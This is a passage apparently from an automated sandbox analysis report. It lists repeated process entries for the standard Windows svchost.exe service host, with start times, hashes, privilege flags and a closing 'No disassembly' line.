                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                Imagebase:0x7ff73c930000
                                                                                                File size:51288 bytes
                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                Target ID:31
                                                                                                Start time:05:11:27
                                                                                                Start date:14/05/2022
                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                Imagebase:0x7ff73c930000
                                                                                                File size:51288 bytes
                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                Target ID:34
                                                                                                Start time:05:11:43
                                                                                                Start date:14/05/2022
                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                Imagebase:0x7ff73c930000
                                                                                                File size:51288 bytes
                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                No disassembly